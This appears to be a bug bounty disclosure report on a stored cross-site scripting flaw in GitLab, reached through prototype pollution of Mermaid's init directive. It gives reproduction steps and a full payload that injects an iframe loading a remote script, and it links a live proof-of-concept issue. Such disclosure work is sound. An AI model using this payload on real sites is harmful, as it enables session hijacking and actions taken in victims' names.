Stored XSS via Mermaid Prototype Pollution vulnerability

### Summary I am continue investigating #1106238 and found additional vector for prototype pollution and stored xss. ### Steps to reproduce 1. Create an issue in any repository 2. Create mermaid diagram with following payload: ``` %%{init: { '__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"&lt;script src=https://gitlab.com/bugbountyuser1/csp/-/jobs/1030502035/artifacts/raw/payload.js&gt; &lt;/script&gt;\">'}} }%% %%{init: { '__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"&lt;script src=https://gitlab.com/bugbountyuser1/csp/-/jobs/1030502035/artifacts/raw/payload.js&gt; &lt;/script&gt;\">'}} }%% sequenceDiagram Alice->>Bob: Hi Bob Bob->>Alice: Hi Alice ``` 3. This will pollute template attribute and, for example, if we click on the search bar after the page loaded, XSS will be executed. This still requires minimal user interaction. ### POC 1. Open https://gitlab.com/cataha319/stored-xss/-/issues/2 2. After page loaded, try select search menu on top bar. {F1391031} {F1391036} ### What is the current *bug* behavior? Mermaid allows setting __proto__ attribute in the directive which leads to stored XSS. ### What is the expected *correct* behavior? Mermaid doesn't allow __proto__ attributed to being set in the directive and merged with the config. ### Output of checks This vulnerability was tested on gitlab.com. On a local Gitlab instance with a newer version(same as gitlab.com) of Mermaid, it works too. ## Impact An attacker who can add Mermaid diagram to the page will can steal some data or make any actions as user.